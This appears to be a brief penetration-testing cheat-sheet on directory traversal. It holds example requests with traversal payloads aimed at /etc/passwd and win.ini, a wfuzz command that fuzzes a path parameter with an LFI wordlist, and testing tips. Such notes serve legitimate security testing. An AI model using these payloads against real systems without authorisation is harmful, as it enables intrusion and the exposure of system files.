Traversal Vulnerabilities

Look for references to files in url, like this one:


GET /files/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

GET /specials?menu=../../../../../../../windows/win.ini

Main ASCII for URL encoding:

%2f (forward slash "/")
%20 (single space " ")
%3D (equal sign "=")

Fuzzing the Path Parameter:

wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt http://<url>/relativePathing.php?path=../../../../../../../../../../FUZZ

# use --hc and --hh for erroneus results


Check for different 404 response sizes

This might indicate that the application handles 404 errors differently from the Web Server, which may lead to directory traversal vulnerabilities.

Test different methods

Make sure to test not only GET but also POST, PUT, PATCH and DELETE.